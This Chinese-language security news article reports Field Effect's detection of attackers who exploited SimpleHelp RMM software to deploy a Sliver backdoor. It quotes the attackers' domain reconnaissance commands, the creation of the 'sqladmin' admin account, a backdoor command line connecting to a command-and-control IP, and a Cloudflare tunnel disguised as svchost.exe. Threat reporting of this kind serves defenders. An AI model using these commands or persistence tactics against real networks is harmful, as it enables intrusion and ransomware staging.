安全客 02月10日
威胁行为者利用简单帮助漏洞部署Sliver后门
index_new5.html
../../../zaker_core/zaker_tpl_static/wap/tpl_guoji1.html

 

网络安全公司Field Effect成功挫败了一起利用SimpleHelp RMM软件漏洞的网络攻击。攻击者通过该漏洞渗透目标网络,建立持久访问,并部署Sliver后门程序。攻击始于被攻陷的SimpleHelp RMM客户端,恶意连接来自爱沙尼亚的IP地址。攻击者执行侦察命令,创建管理员账户,并安装恶意agent.exe文件,该文件与Sliver后渗透框架一致。Field Effect的MDR解决方案迅速检测到异常,隔离了受感染的端点。攻击者还试图通过Cloudflare隧道绕过防火墙,但被Field Effect阻止。类似策略之前在Akira勒索软件组织活动中也有观察到。

⚠️ SimpleHelp RMM软件存在新发现的漏洞,被威胁行为者利用进行网络攻击,攻击者利用JWrapper攻陷SimpleHelp RMM客户端,从而获得初始访问权限。

💻 攻击者获得访问权限后,会执行一系列侦察命令,例如ipconfig /all、net group等,以枚举系统信息、用户账户和网络结构,为后续攻击做准备。

🛡️ Field Effect的MDR解决方案在攻击早期阶段检测到异常,发出了高严重性警报,并隔离了受感染的端点,有效阻止了攻击者部署勒索软件。

🔑 攻击者试图通过创建名为“sqladmin”的新管理员账户来提升权限,并安装恶意的agent.exe二进制文件作为持久化机制,该文件与Sliver后渗透框架一致。

网络安全公司 Field Effect 识别并挫败了一场复杂的网络攻击,此次攻击利用了在 SimpleHelp 的远程监控与管理(RMM)软件中新发现的漏洞。威胁行为者利用这些漏洞渗透目标网络,建立持久访问权限,并部署 Sliver 后门程序。Sliver 是一种后渗透框架,常用于红队演练,但如今越来越多地被网络犯罪分子滥用。据 Field Effect 称,“此次攻击涉及快速且蓄意地执行一系列入侵后策略、技术和流程(TTPs),包括网络与系统探测、创建管理员账户以及建立持久化机制。若不是 Field Effect 的托管检测与响应(MDR)服务阻止了这次攻击,攻击者很可能会部署勒索软件。”攻击始于一名威胁行为者通过被攻陷的名为 JWrapper – 远程访问的 SimpleHelp RMM 客户端获得访问权限。恶意连接源自位于爱沙尼亚的 IP 地址 194.76.227 [.] 171,通过 Shodan 扫描发现,该地址在 80 端口托管着一个 SimpleHelp 服务器。然而,由于各安全供应商的检测率较低,这种连接很可能避开了标准的网络安全过滤器。获得访问权限后,攻击者执行了一系列侦察命令,以枚举系统信息、用户账户和网络结构。观察到的命令如下:ipconfig /all(网络配置详细信息)net group “domain admins” /domain(列出域管理员)nltest /dclist:(枚举域控制器)tasklist(列出正在运行的进程)net share 和 net use(枚举共享网络资源)运行在 213.183.45 [.] 230 上的 SimpleHelp 实例截图 | 来源:Field Effect幸运的是,Field Effect 的 MDR 解决方案迅速检测到异常,发出了高严重性警报,并在进一步升级之前隔离了受感染的端点。侦察之后,攻击者通过创建一个名为 “sqladmin” 的新管理员账户来提升权限。然后,他们安装了一个恶意的 agent.exe 二进制文件作为持久化机制,以防失去 RMM 访问权限。Field Effect 对 agent.exe 的分析表明,它与 Sliver 后渗透框架一致,Sliver 是一种基于 Go 语言的先进的命令与控制(C2)工具,可与 Cobalt Strike 和 Metasploit 相媲美。该二进制文件展现出进程注入、服务篡改和文件系统操作能力,这些都是基于 Sliver 入侵的典型特征。Field Effect 报告称:“后门程序被配置为通过以下命令连接到 45.9.148 [.] 136 的 IP 地址和 443 端口:agent.exe -connect 45.9.148 [.] 136:443 -ignore-cert。”这个位于荷兰的 C2 基础设施被发现正在运行 OpenSSH、AnyDesk 和其他远程访问服务,使其成为进一步恶意活动的强大发射平台。进入环境后,攻击者将目标对准域控制器(DC),并重新建立 RMM 访问权限以执行相同的侦察命令集。然而,他们没有部署 agent.exe,而是选择了一个伪装成 Windows svchost.exe 的 Cloudflare 隧道,有效地绕过了防火墙限制,并对安全工具隐藏了流量。据 Field Effect 称,“Field Effect MDR 端点代理阻止了隧道的尝试执行,随后该系统也从网络中被隔离。” 如果该活动未被检测到,这个隧道可能会为进一步的恶意软件部署提供便利,有可能导致勒索软件攻击。虽然尚未明确归因,但 Field Effect 指出,之前在与 Akira 勒索软件组织相关的活动中也观察到了类似策略。然而,鉴于这些常见的 TTPs,多个威胁行为者可能正在利用 SimpleHelp 漏洞来实现自己的目的。Field Effect 还证实,1 月 28 日早些时候的一次攻击,最初怀疑与 SimpleHelp 有关,实际上确实是由相同的 RMM 利用漏洞向量引起的。对 SimpleHelp 服务器配置的分析显示,它已被修改为接受来自位于俄罗斯 IP(213.183.45 [.] 230)上的恶意 SimpleHelp 实例的连接。

Fish AI Reader

Fish AI Reader

AI辅助创作,多种专业模板,深度分析,高质量内容生成。从观点提取到深度思考,FishAI为您提供全方位的创作支持。新版本引入自定义参数,让您的创作更加个性化和精准。

FishAI

FishAI

鱼阅,AI 时代的下一个智能信息助手,助你摆脱信息焦虑

联系邮箱 441953276@qq.com

相关标签

SimpleHelp RMM 网络安全 Sliver 漏洞攻击
相关文章